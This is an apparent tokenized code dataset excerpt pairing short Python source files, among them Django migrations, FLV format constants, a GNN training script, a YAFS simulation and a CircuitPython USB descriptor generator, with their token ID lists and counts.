content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
import xmlrpc.client if __name__ == '__main__': main()
[ 11748, 35555, 81, 14751, 13, 16366, 628, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1388, 3419, 198 ]
2.384615
26
# Generated by Django 3.0.7 on 2020-07-27 19:23 import build.models from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 22, 319, 12131, 12, 2998, 12, 1983, 678, 25, 1954, 198, 198, 11748, 1382, 13, 27530, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
3
37
import argparse import os import torch import yaml DEFAULT_DEVICE = 'cuda:0'
[ 11748, 1822, 29572, 198, 198, 11748, 28686, 198, 11748, 28034, 198, 11748, 331, 43695, 198, 198, 7206, 38865, 62, 7206, 27389, 796, 705, 66, 15339, 25, 15, 6, 628, 198 ]
2.7
30
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion.simplify_nonsense_channel_mode_conversion import \ SimplifyNonsenseChannelModeConversion from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion.simplify_redundant_channel_mode_conversion import \ SimplifyRedundantChannelModeConversion from webdnn.graph.optimize_rule import OptimizeRuleGroup
[ 6738, 3992, 67, 20471, 13, 1891, 437, 13, 12384, 4743, 13, 40085, 1096, 62, 38785, 13, 14323, 489, 1958, 62, 17620, 62, 14171, 62, 1102, 9641, 13, 14323, 489, 1958, 62, 77, 46563, 62, 17620, 62, 14171, 62, 1102, 9641, 1330, 3467, 19...
3.054264
129
""" The constants used in FLV files and their meanings. """ # Tag type (TAG_TYPE_AUDIO, TAG_TYPE_VIDEO, TAG_TYPE_SCRIPT) = (8, 9, 18) # Sound format (SOUND_FORMAT_PCM_PLATFORM_ENDIAN, SOUND_FORMAT_ADPCM, SOUND_FORMAT_MP3, SOUND_FORMAT_PCM_LITTLE_ENDIAN, SOUND_FORMAT_NELLYMOSER_16KHZ, SOUND_FORMAT_NELLYMOSER_8KHZ, SOUND_FORMAT_NELLYMOSER, SOUND_FORMAT_G711_A_LAW, SOUND_FORMAT_G711_MU_LAW) = range(9) (SOUND_FORMAT_AAC, SOUND_FORMAT_SPEEX) = range(10, 12) (SOUND_FORMAT_MP3_8KHZ, SOUND_FORMAT_DEVICE_SPECIFIC) = range(14, 16) sound_format_to_string = { SOUND_FORMAT_PCM_PLATFORM_ENDIAN: "Linear PCM, platform endian", SOUND_FORMAT_ADPCM: "ADPCM", SOUND_FORMAT_MP3: "MP3", SOUND_FORMAT_PCM_LITTLE_ENDIAN: "Linear PCM, little endian", SOUND_FORMAT_NELLYMOSER_16KHZ: "Nellymoser 16-kHz mono", SOUND_FORMAT_NELLYMOSER_8KHZ: "Nellymoser 8-kHz mono", SOUND_FORMAT_NELLYMOSER: "Nellymoser", SOUND_FORMAT_G711_A_LAW: "G.711 A-law logarithmic PCM", SOUND_FORMAT_G711_MU_LAW: "G.711 mu-law logarithmic PCM", SOUND_FORMAT_AAC: "AAC", SOUND_FORMAT_SPEEX: "Speex", SOUND_FORMAT_MP3_8KHZ: "MP3 8-kHz", SOUND_FORMAT_DEVICE_SPECIFIC: "Device-specific sound" } # Sound rate (SOUND_RATE_5_5_KHZ, SOUND_RATE_11_KHZ, SOUND_RATE_22_KHZ, SOUND_RATE_44_KHZ) = range(4) sound_rate_to_string = { SOUND_RATE_5_5_KHZ: "5.5-kHz", SOUND_RATE_11_KHZ: "11-kHz", SOUND_RATE_22_KHZ: "22-kHz", SOUND_RATE_44_KHZ: "44-kHz" } # Sound size (SOUND_SIZE_8_BIT, SOUND_SIZE_16_BIT) = range(2) sound_size_to_string = { SOUND_SIZE_8_BIT: "snd8Bit", SOUND_SIZE_16_BIT: "snd16Bit" } # Sound type (SOUND_TYPE_MONO, SOUND_TYPE_STEREO) = range(2) sound_type_to_string = { SOUND_TYPE_MONO: "sndMono", SOUND_TYPE_STEREO: "sndStereo" } # AAC packet type (AAC_PACKET_TYPE_SEQUENCE_HEADER, AAC_PACKET_TYPE_RAW) = range(2) aac_packet_type_to_string = { AAC_PACKET_TYPE_SEQUENCE_HEADER: "sequence header", AAC_PACKET_TYPE_RAW: "raw" } # Codec ID (CODEC_ID_JPEG, CODEC_ID_H263, CODEC_ID_SCREEN_VIDEO, CODEC_ID_VP6, CODEC_ID_VP6_WITH_ALPHA, CODEC_ID_SCREEN_VIDEO_V2, CODEC_ID_H264) = range(1, 8) codec_id_to_string = { CODEC_ID_JPEG: "JPEG", CODEC_ID_H263: "Sorenson H.263", CODEC_ID_SCREEN_VIDEO: "Screen video", CODEC_ID_VP6: "On2 VP6", CODEC_ID_VP6_WITH_ALPHA: "On2 VP6 with alpha channel", CODEC_ID_SCREEN_VIDEO_V2: "Screen video version 2", CODEC_ID_H264: "H.264" } # Frame type (FRAME_TYPE_KEYFRAME, FRAME_TYPE_INTERFRAME, FRAME_TYPE_DISPOSABLE_INTERFRAME, FRAME_TYPE_GENERATED_KEYFRAME, FRAME_TYPE_INFO_FRAME) = range(1, 6) frame_type_to_string = { FRAME_TYPE_KEYFRAME: "keyframe", FRAME_TYPE_INTERFRAME: "interframe", FRAME_TYPE_DISPOSABLE_INTERFRAME: "disposable interframe", FRAME_TYPE_GENERATED_KEYFRAME: "generated keyframe", FRAME_TYPE_INFO_FRAME: "video info/command frame" } # H.264 packet type (H264_PACKET_TYPE_SEQUENCE_HEADER, H264_PACKET_TYPE_NALU, H264_PACKET_TYPE_END_OF_SEQUENCE) = range(3) h264_packet_type_to_string = { H264_PACKET_TYPE_SEQUENCE_HEADER: "sequence header", H264_PACKET_TYPE_NALU: "NAL unit", H264_PACKET_TYPE_END_OF_SEQUENCE: "sequence end" } # Value type (VALUE_TYPE_NUMBER, VALUE_TYPE_BOOLEAN, VALUE_TYPE_STRING, VALUE_TYPE_OBJECT, VALUE_TYPE_MOVIECLIP, VALUE_TYPE_NULL, VALUE_TYPE_UNDEFINED, VALUE_TYPE_REFERENCE, VALUE_TYPE_ECMA_ARRAY) = range(9) (VALUE_TYPE_STRICT_ARRAY, VALUE_TYPE_DATE, VALUE_TYPE_LONGSTRING) = range(10, 13) value_type_to_string = { VALUE_TYPE_NUMBER: 'Number', VALUE_TYPE_BOOLEAN: 'Boolean', VALUE_TYPE_STRING: 'String', VALUE_TYPE_OBJECT: 'Object', VALUE_TYPE_MOVIECLIP: 'MovieClip', VALUE_TYPE_NULL: 'Null', VALUE_TYPE_UNDEFINED: 'Undefined', VALUE_TYPE_REFERENCE: 'Reference', VALUE_TYPE_ECMA_ARRAY: 'ECMA Array', VALUE_TYPE_STRICT_ARRAY: 'Strict Array', VALUE_TYPE_DATE: 'Date', VALUE_TYPE_LONGSTRING: 'Longstring' }
[ 37811, 198, 464, 38491, 973, 287, 9977, 53, 3696, 290, 511, 26368, 13, 198, 37811, 198, 198, 2, 17467, 2099, 198, 7, 42197, 62, 25216, 62, 48877, 9399, 11, 37801, 62, 25216, 62, 42937, 11, 37801, 62, 25216, 62, 6173, 46023, 8, 796, ...
2.005015
1,994
from nltk.corpus import semcor # if __name__ == "__main__": # s = semcor.tagged_sents(tag='sem')[0] # for chunk in s: # a = semcor_chunk(chunk) # print a.get_syn_set() # for chunk in s: # a = semcor_chunk(chunk) # print a.get_words()
[ 6738, 299, 2528, 74, 13, 10215, 79, 385, 1330, 5026, 10215, 198, 198, 2, 611, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 2, 220, 197, 82, 796, 5026, 10215, 13, 12985, 2004, 62, 82, 658, 7, 12985, 11639, 43616, 11537, ...
1.97619
126
import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers from load_cora import load_cora from baseline_model import create_ffn from utils import run_experiment from utils import display_learning_curves # Graph convolution layer if __name__ == '__main__': papers, train_data, test_data, paper_idx, class_idx, citations, feature_names = load_cora(verbose=1) num_features = len(feature_names) num_classes = len(class_idx) hidden_units = [32, 32] learning_rate = 0.01 dropout_rate = 0.5 epochs = 300 batch_size = 256 # Create an edges array (sparse adjacency matrix) of shape [2, num_edges] edges = citations[["source", "target"]].to_numpy().T #print(edges) # Create an edge weights array of ones (default weights) edge_weights = tf.ones(shape=edges.shape[1]) # Create a node features array of shape [num_nodes, num_features] node_features = tf.cast( papers.sort_values("paper_id")[feature_names].to_numpy(), dtype=tf.float32) # Create graph info tuple with node_features, edges, and edge_weights graph_info = (node_features, edges, edge_weights) print("Edges shape: ", edges.shape) print("Nodes shape: ", node_features.shape) gnn_model = GNNNodeClassifier( graph_info=graph_info, num_classes=num_classes, hidden_units=hidden_units, dropout_rate=dropout_rate, name="gnn_model" ) print("GNN output shape: ", gnn_model([1, 10, 100])) gnn_model.summary() # Train the GNN model X_train = train_data.paper_id.to_numpy() y_train = train_data.subject history = run_experiment(gnn_model, X_train, y_train, batch_size, epochs, learning_rate) # Plot the learning curves display_learning_curves(history, figure_name="gnn.png") # Evaluate on test data X_test = test_data.paper_id.to_numpy() y_test = test_data.subject _, test_accuracy = gnn_model.evaluate(x=X_test, y=y_test, verbose=1) print(f"Test accuracy: {round(test_accuracy * 100, 2)}%")
[ 11748, 11192, 273, 11125, 355, 48700, 198, 6738, 11192, 273, 11125, 1330, 41927, 292, 198, 6738, 11192, 273, 11125, 13, 6122, 292, 1330, 11685, 198, 6738, 3440, 62, 66, 5799, 1330, 3440, 62, 66, 5799, 198, 6738, 14805, 62, 19849, 1330, ...
2.772346
716
"""Discover Samsung Smart TV services.""" from . import SSDPDiscoverable from ..const import ATTR_NAME # For some models, Samsung forces a [TV] prefix to the user-specified name. FORCED_NAME_PREFIX = '[TV]'
[ 37811, 44596, 10397, 10880, 3195, 2594, 526, 15931, 198, 6738, 764, 1330, 21252, 5760, 29392, 540, 198, 6738, 11485, 9979, 1330, 5161, 5446, 62, 20608, 198, 198, 2, 1114, 617, 4981, 11, 10397, 3386, 257, 685, 6849, 60, 21231, 284, 262, ...
3.42623
61
"""Package for reverse-engineering.""" from .rpa import *
[ 37811, 27813, 329, 9575, 12, 40321, 526, 15931, 198, 198, 6738, 764, 81, 8957, 1330, 1635, 198 ]
3.470588
17
# Generated by Django 3.2.5 on 2021-12-21 19:42 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 513, 13, 17, 13, 20, 319, 33448, 12, 1065, 12, 2481, 678, 25, 3682, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
""" This is the most simple scenario with a basic topology, some users and a set of apps with only one service. @author: Isaac Lera """ import os import time import json import random import logging.config import networkx as nx import numpy as np from pathlib import Path from yafs.core import Sim from yafs.application import create_applications_from_json from yafs.topology import Topology from yafs.placement import JSONPlacement from yafs.path_routing import DeviceSpeedAwareRouting from yafs.distribution import deterministic_distribution from yafs.stats import Stats RANDOM_SEED = 1 if __name__ == '__main__': logging.config.fileConfig(os.getcwd() + '/logging.ini') nIterations = 1 # iteration for each experiment simulationDuration = 1000 # Iteration for each experiment changing the seed of randoms for iteration in range(nIterations): random.seed(iteration) logging.info("Running experiment it: - %i" % iteration) start_time = time.time() main(stop_time=simulationDuration, it=iteration) print("\n--- %s seconds ---" % (time.time() - start_time)) print("Simulation Done!") m = Stats(defaultPath="results/sim_trace") # print ("\tNetwork bytes transmitted:") # print (f"\t\t{m.bytes_transmitted():.1f}") # m.df_link.head(15) # from Stats class time_loops = [["M.USER.APP.0", "M.USER.APP.1", "M.USER.APP.2", "M.USER.APP.3"]] m.showResults2(10000, time_loops=time_loops) m.compute_times_df() print ("\t- Network saturation -") print() print ("\t\tAverage waiting messages : " f"{m.average_messages_not_transmitted()}") print() print ("\t\tPeak of waiting messages :" f"{m.peak_messages_not_transmitted()}") print() print(f"\t\tShow Loops: {m.showLoops(time_loops)}") print() print (f"\t\tTOTAL messages not transmitted:" f" {m.messages_not_transmitted()}") print() #print(m.df.head()) #print(m.df['time_latency']) #print(m.df_link.head()) print(m.get_df_modules())
[ 37811, 198, 220, 220, 220, 770, 318, 262, 749, 2829, 8883, 351, 257, 4096, 1353, 1435, 11, 617, 2985, 290, 257, 900, 286, 6725, 351, 691, 530, 2139, 13, 628, 220, 220, 220, 2488, 9800, 25, 19068, 406, 8607, 198, 37811, 198, 11748, ...
2.408435
901
from db import db # class RisklayerPrognosisSchema(SQLAlchemyAutoSchema): # class Meta: # strict = True # model = RisklayerPrognosis # # timestamp = fields.Timestamp(data_key="datenbestand") # prognosis = fields.Number(data_key="prognosis")
[ 6738, 20613, 1330, 20613, 628, 198, 2, 1398, 19602, 29289, 2964, 4593, 5958, 27054, 2611, 7, 17861, 2348, 26599, 27722, 27054, 2611, 2599, 198, 2, 220, 220, 220, 220, 1398, 30277, 25, 198, 2, 220, 220, 220, 220, 220, 220, 220, 220, ...
2.567308
104
import os import unittest os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' import django if django.VERSION >= (1, 7): django.setup() from django import forms from django.db import models from django.forms.forms import NON_FIELD_ERRORS from django_secureform.forms import SecureForm if __name__ == '__main__': unittest.main()
[ 11748, 28686, 198, 11748, 555, 715, 395, 198, 418, 13, 268, 2268, 17816, 35028, 1565, 11230, 62, 28480, 51, 20754, 62, 33365, 24212, 20520, 796, 705, 33692, 6, 198, 198, 11748, 42625, 14208, 198, 361, 42625, 14208, 13, 43717, 18189, 357...
2.819672
122
import cv2 as cv import numpy as np cap = cv.VideoCapture(1) print(cap.get(cv.CAP_PROP_FRAME_WIDTH)) print(cap.get(cv.CAP_PROP_FRAME_HEIGHT)) cap.set(3,3000) cap.set(4,3000) print(cap.get(cv.CAP_PROP_FRAME_WIDTH)) print(cap.get(cv.CAP_PROP_FRAME_HEIGHT)) while (cap.isOpened()): ret , frame = cap.read() if (ret == True): cv.imshow("camVid", frame) if cv.waitKey(25) & 0xFF == ord('q'): break else: break cap.release() cv.destroyAllWindows()
[ 11748, 269, 85, 17, 355, 269, 85, 198, 11748, 299, 32152, 355, 45941, 198, 198, 11128, 796, 269, 85, 13, 10798, 49630, 7, 16, 8, 198, 198, 4798, 7, 11128, 13, 1136, 7, 33967, 13, 33177, 62, 4805, 3185, 62, 10913, 10067, 62, 54, ...
1.995968
248
# from pypy-benchmarks/own/chaos.py, with some minor modifications # (more output, took out the benchmark harness) # import random, math, sys, time SIZE = 9 GAMES = 200 KOMI = 7.5 EMPTY, WHITE, BLACK = 0, 1, 2 SHOW = {EMPTY: '.', WHITE: 'o', BLACK: 'x'} PASS = -1 MAXMOVES = SIZE*SIZE*3 TIMESTAMP = 0 MOVES = 0 def user_move(board): while True: text = raw_input('?').strip() if text == 'p': return PASS if text == 'q': raise EOFError try: x, y = [int(i) for i in text.split()] except ValueError: continue if not (0 <= x < SIZE and 0 <= y < SIZE): continue pos = to_pos(x, y) if board.useful(pos): return pos if __name__ == "__main__": main(100)
[ 2, 422, 279, 4464, 88, 12, 26968, 14306, 14, 593, 14, 354, 7495, 13, 9078, 11, 351, 617, 4159, 19008, 198, 2, 357, 3549, 5072, 11, 1718, 503, 262, 18335, 19356, 8, 198, 2, 198, 198, 11748, 4738, 11, 10688, 11, 25064, 11, 640, 19...
2.030691
391
# SPDX-FileCopyrightText: 2014 MicroPython & CircuitPython contributors (https://github.com/adafruit/circuitpython/graphs/contributors) # # SPDX-License-Identifier: MIT import argparse import os import sys sys.path.append("../../tools/usb_descriptor") from adafruit_usb_descriptor import audio, audio10, cdc, hid, midi, msc, standard, util import hid_report_descriptors DEFAULT_INTERFACE_NAME = 'CircuitPython' ALL_DEVICES='CDC,MSC,AUDIO,HID' ALL_DEVICES_SET=frozenset(ALL_DEVICES.split(',')) DEFAULT_DEVICES='CDC,MSC,AUDIO,HID' ALL_HID_DEVICES='KEYBOARD,MOUSE,CONSUMER,SYS_CONTROL,GAMEPAD,DIGITIZER,XAC_COMPATIBLE_GAMEPAD,RAW' ALL_HID_DEVICES_SET=frozenset(ALL_HID_DEVICES.split(',')) # Digitizer works on Linux but conflicts with mouse, so omit it. DEFAULT_HID_DEVICES='KEYBOARD,MOUSE,CONSUMER,GAMEPAD' parser = argparse.ArgumentParser(description='Generate USB descriptors.') parser.add_argument('--highspeed', default=False, action='store_true', help='descriptor for highspeed device') parser.add_argument('--manufacturer', type=str, help='manufacturer of the device') parser.add_argument('--product', type=str, help='product name of the device') parser.add_argument('--vid', type=lambda x: int(x, 16), help='vendor id') parser.add_argument('--pid', type=lambda x: int(x, 16), help='product id') parser.add_argument('--serial_number_length', type=int, default=32, help='length needed for the serial number in digits') parser.add_argument('--devices', type=lambda l: tuple(l.split(',')), default=DEFAULT_DEVICES, help='devices to include in descriptor (AUDIO includes MIDI support)') parser.add_argument('--hid_devices', type=lambda l: tuple(l.split(',')), default=DEFAULT_HID_DEVICES, help='HID devices to include in HID report descriptor') parser.add_argument('--interface_name', type=str, help='The name/prefix to use in the interface descriptions', default=DEFAULT_INTERFACE_NAME) parser.add_argument('--no-renumber_endpoints', dest='renumber_endpoints', action='store_false', help='use to not renumber endpoint') parser.add_argument('--cdc_ep_num_notification', type=int, default=0, help='endpoint number of CDC NOTIFICATION') parser.add_argument('--cdc_ep_num_data_out', type=int, default=0, help='endpoint number of CDC DATA OUT') parser.add_argument('--cdc_ep_num_data_in', type=int, default=0, help='endpoint number of CDC DATA IN') parser.add_argument('--msc_ep_num_out', type=int, default=0, help='endpoint number of MSC OUT') parser.add_argument('--msc_ep_num_in', type=int, default=0, help='endpoint number of MSC IN') parser.add_argument('--hid_ep_num_out', type=int, default=0, help='endpoint number of HID OUT') parser.add_argument('--hid_ep_num_in', type=int, default=0, help='endpoint number of HID IN') parser.add_argument('--midi_ep_num_out', type=int, default=0, help='endpoint number of MIDI OUT') parser.add_argument('--midi_ep_num_in', type=int, default=0, help='endpoint number of MIDI IN') parser.add_argument('--output_c_file', type=argparse.FileType('w', encoding='UTF-8'), required=True) parser.add_argument('--output_h_file', type=argparse.FileType('w', encoding='UTF-8'), required=True) args = parser.parse_args() unknown_devices = list(frozenset(args.devices) - ALL_DEVICES_SET) if unknown_devices: raise ValueError("Unknown device(s)", unknown_devices) unknown_hid_devices = list(frozenset(args.hid_devices) - ALL_HID_DEVICES_SET) if unknown_hid_devices: raise ValueError("Unknown HID devices(s)", unknown_hid_devices) if not args.renumber_endpoints: if 'CDC' in args.devices: if args.cdc_ep_num_notification == 0: raise ValueError("CDC notification endpoint number must not be 0") elif args.cdc_ep_num_data_out == 0: raise ValueError("CDC data OUT endpoint number must not be 0") elif args.cdc_ep_num_data_in == 0: raise ValueError("CDC data IN endpoint number must not be 0") if 'MSC' in args.devices: if args.msc_ep_num_out == 0: raise ValueError("MSC endpoint OUT number must not be 0") elif args.msc_ep_num_in == 0: raise ValueError("MSC endpoint IN number must not be 0") if 'HID' in args.devices: if args.args.hid_ep_num_out == 0: raise ValueError("HID endpoint OUT number must not be 0") elif args.hid_ep_num_in == 0: raise ValueError("HID endpoint IN number must not be 0") if 'AUDIO' in args.devices: if args.args.midi_ep_num_out == 0: raise ValueError("MIDI endpoint OUT number must not be 0") elif args.midi_ep_num_in == 0: raise ValueError("MIDI endpoint IN number must not be 0") # langid must be the 0th string descriptor LANGID_INDEX = StringIndex.index("\u0409", variable_name="language_id") assert LANGID_INDEX == 0 SERIAL_NUMBER_INDEX = StringIndex.index("S" * args.serial_number_length, variable_name="usb_serial_number") device = standard.DeviceDescriptor( description="top", idVendor=args.vid, idProduct=args.pid, iManufacturer=StringIndex.index(args.manufacturer), iProduct=StringIndex.index(args.product), iSerialNumber=SERIAL_NUMBER_INDEX) # Interface numbers are interface-set local and endpoints are interface local # until util.join_interfaces renumbers them. cdc_union = cdc.Union( description="CDC comm", bMasterInterface=0x00, # Adjust this after interfaces are renumbered. bSlaveInterface_list=[0x01]) # Adjust this after interfaces are renumbered. cdc_call_management = cdc.CallManagement( description="CDC comm", bmCapabilities=0x01, bDataInterface=0x01) # Adjust this after interfaces are renumbered. cdc_comm_interface = standard.InterfaceDescriptor( description="CDC comm", bInterfaceClass=cdc.CDC_CLASS_COMM, # Communications Device Class bInterfaceSubClass=cdc.CDC_SUBCLASS_ACM, # Abstract control model bInterfaceProtocol=cdc.CDC_PROTOCOL_NONE, iInterface=StringIndex.index("{} CDC control".format(args.interface_name)), subdescriptors=[ cdc.Header( description="CDC comm", bcdCDC=0x0110), cdc_call_management, cdc.AbstractControlManagement( description="CDC comm", bmCapabilities=0x02), cdc_union, standard.EndpointDescriptor( description="CDC comm in", bEndpointAddress=args.cdc_ep_num_notification | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, wMaxPacketSize=0x0040, bInterval=0x10) ]) cdc_data_interface = standard.InterfaceDescriptor( description="CDC data", bInterfaceClass=cdc.CDC_CLASS_DATA, iInterface=StringIndex.index("{} CDC data".format(args.interface_name)), subdescriptors=[ standard.EndpointDescriptor( description="CDC data out", bEndpointAddress=args.cdc_ep_num_data_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), standard.EndpointDescriptor( description="CDC data in", bEndpointAddress=args.cdc_ep_num_data_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), ]) cdc_interfaces = [cdc_comm_interface, cdc_data_interface] msc_interfaces = [ standard.InterfaceDescriptor( description="MSC", bInterfaceClass=msc.MSC_CLASS, bInterfaceSubClass=msc.MSC_SUBCLASS_TRANSPARENT, bInterfaceProtocol=msc.MSC_PROTOCOL_BULK, iInterface=StringIndex.index("{} Mass Storage".format(args.interface_name)), subdescriptors=[ standard.EndpointDescriptor( description="MSC in", bEndpointAddress=args.msc_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), standard.EndpointDescriptor( description="MSC out", bEndpointAddress=(args.msc_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT), bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), ] ) ] # When there's only one hid_device, it shouldn't have a report id. # Otherwise, report ids are assigned sequentially: # args.hid_devices[0] has report_id 1 # args.hid_devices[1] has report_id 2 # etc. report_ids = {} if len(args.hid_devices) == 1: name = args.hid_devices[0] combined_hid_report_descriptor = hid.ReportDescriptor( description=name, report_descriptor=bytes(hid_report_descriptors.REPORT_DESCRIPTOR_FUNCTIONS[name](0))) report_ids[name] = 0 else: report_id = 1 concatenated_descriptors = bytearray() for name in args.hid_devices: concatenated_descriptors.extend( bytes(hid_report_descriptors.REPORT_DESCRIPTOR_FUNCTIONS[name](report_id))) report_ids[name] = report_id report_id += 1 combined_hid_report_descriptor = hid.ReportDescriptor( description="MULTIDEVICE", report_descriptor=bytes(concatenated_descriptors)) # ASF4 expects keyboard and generic devices to have both in and out endpoints, # and will fail (possibly silently) if both are not supplied. hid_endpoint_in_descriptor = standard.EndpointDescriptor( description="HID in", bEndpointAddress=args.hid_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, bInterval=8) hid_endpoint_out_descriptor = standard.EndpointDescriptor( description="HID out", bEndpointAddress=args.hid_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_INTERRUPT, bInterval=8) hid_interfaces = [ standard.InterfaceDescriptor( description="HID Multiple Devices", bInterfaceClass=hid.HID_CLASS, bInterfaceSubClass=hid.HID_SUBCLASS_NOBOOT, bInterfaceProtocol=hid.HID_PROTOCOL_NONE, iInterface=StringIndex.index("{} HID".format(args.interface_name)), subdescriptors=[ hid.HIDDescriptor( description="HID", wDescriptorLength=len(bytes(combined_hid_report_descriptor))), hid_endpoint_in_descriptor, hid_endpoint_out_descriptor, ] ), ] # Audio! # In and out here are relative to CircuitPython # USB OUT -> midi_in_jack_emb -> midi_out_jack_ext -> CircuitPython midi_in_jack_emb = midi.InJackDescriptor( description="MIDI PC -> {}".format(args.interface_name), bJackType=midi.JACK_TYPE_EMBEDDED, iJack=StringIndex.index("{} usb_midi.ports[0]".format(args.interface_name))) midi_out_jack_ext = midi.OutJackDescriptor( description="MIDI data out to user code.", bJackType=midi.JACK_TYPE_EXTERNAL, input_pins=[(midi_in_jack_emb, 1)], iJack=0) # USB IN <- midi_out_jack_emb <- midi_in_jack_ext <- CircuitPython midi_in_jack_ext = midi.InJackDescriptor( description="MIDI data in from user code.", bJackType=midi.JACK_TYPE_EXTERNAL, iJack=0) midi_out_jack_emb = midi.OutJackDescriptor( description="MIDI PC <- {}".format(args.interface_name), bJackType=midi.JACK_TYPE_EMBEDDED, input_pins=[(midi_in_jack_ext, 1)], iJack=StringIndex.index("{} usb_midi.ports[1]".format(args.interface_name))) audio_midi_interface = standard.InterfaceDescriptor( description="Midi goodness", bInterfaceClass=audio.AUDIO_CLASS_DEVICE, bInterfaceSubClass=audio.AUDIO_SUBCLASS_MIDI_STREAMING, bInterfaceProtocol=audio.AUDIO_PROTOCOL_V1, iInterface=StringIndex.index("{} MIDI".format(args.interface_name)), subdescriptors=[ midi.Header( jacks_and_elements=[ midi_in_jack_emb, midi_in_jack_ext, midi_out_jack_emb, midi_out_jack_ext ], ), standard.EndpointDescriptor( description="MIDI data out to {}".format(args.interface_name), bEndpointAddress=args.midi_ep_num_out | standard.EndpointDescriptor.DIRECTION_OUT, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval=0, wMaxPacketSize=512 if args.highspeed else 64), midi.DataEndpointDescriptor(baAssocJack=[midi_in_jack_emb]), standard.EndpointDescriptor( description="MIDI data in from {}".format(args.interface_name), bEndpointAddress=args.midi_ep_num_in | standard.EndpointDescriptor.DIRECTION_IN, bmAttributes=standard.EndpointDescriptor.TYPE_BULK, bInterval = 0x0, wMaxPacketSize=512 if args.highspeed else 64), midi.DataEndpointDescriptor(baAssocJack=[midi_out_jack_emb]), ]) cs_ac_interface = audio10.AudioControlInterface( description="Empty audio control", audio_streaming_interfaces = [], midi_streaming_interfaces = [ audio_midi_interface ] ) audio_control_interface = standard.InterfaceDescriptor( description="All the audio", bInterfaceClass=audio.AUDIO_CLASS_DEVICE, bInterfaceSubClass=audio.AUDIO_SUBCLASS_CONTROL, bInterfaceProtocol=audio.AUDIO_PROTOCOL_V1, iInterface=StringIndex.index("{} Audio".format(args.interface_name)), subdescriptors=[ cs_ac_interface, ]) # Audio streaming interfaces must occur before MIDI ones. audio_interfaces = [audio_control_interface] + cs_ac_interface.audio_streaming_interfaces + cs_ac_interface.midi_streaming_interfaces interfaces_to_join = [] if 'CDC' in args.devices: interfaces_to_join.append(cdc_interfaces) if 'MSC' in args.devices: interfaces_to_join.append(msc_interfaces) if 'HID' in args.devices: interfaces_to_join.append(hid_interfaces) if 'AUDIO' in args.devices: interfaces_to_join.append(audio_interfaces) # util.join_interfaces() will renumber the endpoints to make them unique across descriptors, # and renumber the interfaces in order. But we still need to fix up certain # interface cross-references. interfaces = util.join_interfaces(interfaces_to_join, renumber_endpoints=args.renumber_endpoints) # Now adjust the CDC interface cross-references. cdc_union.bMasterInterface = cdc_comm_interface.bInterfaceNumber cdc_union.bSlaveInterface_list = [cdc_data_interface.bInterfaceNumber] cdc_call_management.bDataInterface = cdc_data_interface.bInterfaceNumber cdc_iad = standard.InterfaceAssociationDescriptor( description="CDC IAD", bFirstInterface=cdc_comm_interface.bInterfaceNumber, bInterfaceCount=len(cdc_interfaces), bFunctionClass=cdc.CDC_CLASS_COMM, # Communications Device Class bFunctionSubClass=cdc.CDC_SUBCLASS_ACM, # Abstract control model bFunctionProtocol=cdc.CDC_PROTOCOL_NONE) descriptor_list = [] if 'CDC' in args.devices: # Put the CDC IAD just before the CDC interfaces. # There appears to be a bug in the Windows composite USB driver that requests the # HID report descriptor with the wrong interface number if the HID interface is not given # first. However, it still fetches the descriptor anyway. We could reorder the interfaces but # the Windows 7 Adafruit_usbser.inf file thinks CDC is at Interface 0, so we'll leave it # there for backwards compatibility. descriptor_list.append(cdc_iad) descriptor_list.extend(cdc_interfaces) if 'MSC' in args.devices: descriptor_list.extend(msc_interfaces) if 'HID' in args.devices: descriptor_list.extend(hid_interfaces) if 'AUDIO' in args.devices: # Only add the control interface because other audio interfaces are managed by it to ensure the # correct ordering. descriptor_list.append(audio_control_interface) # Finally, build the composite descriptor. configuration = standard.ConfigurationDescriptor( description="Composite configuration", wTotalLength=(standard.ConfigurationDescriptor.bLength + sum([len(bytes(x)) for x in descriptor_list])), bNumInterfaces=len(interfaces)) descriptor_list.insert(0, configuration) string_descriptors = [standard.StringDescriptor(string) for string in StringIndex.strings_in_order()] serial_number_descriptor = string_descriptors[SERIAL_NUMBER_INDEX] c_file = args.output_c_file h_file = args.output_h_file c_file.write("""\ #include <stdint.h> #include "py/objtuple.h" #include "shared-bindings/usb_hid/Device.h" #include "{H_FILE_NAME}" """.format(H_FILE_NAME=h_file.name)) c_file.write("""\ // {DESCRIPTION} : {CLASS} """.format(DESCRIPTION=device.description, CLASS=device.__class__)) c_file.write("""\ const uint8_t usb_desc_dev[] = { """) for b in bytes(device): c_file.write("0x{:02x}, ".format(b)) c_file.write("""\ }; """) c_file.write("""\ const uint8_t usb_desc_cfg[] = { """) # Write out all the regular descriptors as one long array (that's how ASF4 does it). descriptor_length = 0 for descriptor in descriptor_list: c_file.write("""\ // {DESCRIPTION} : {CLASS} 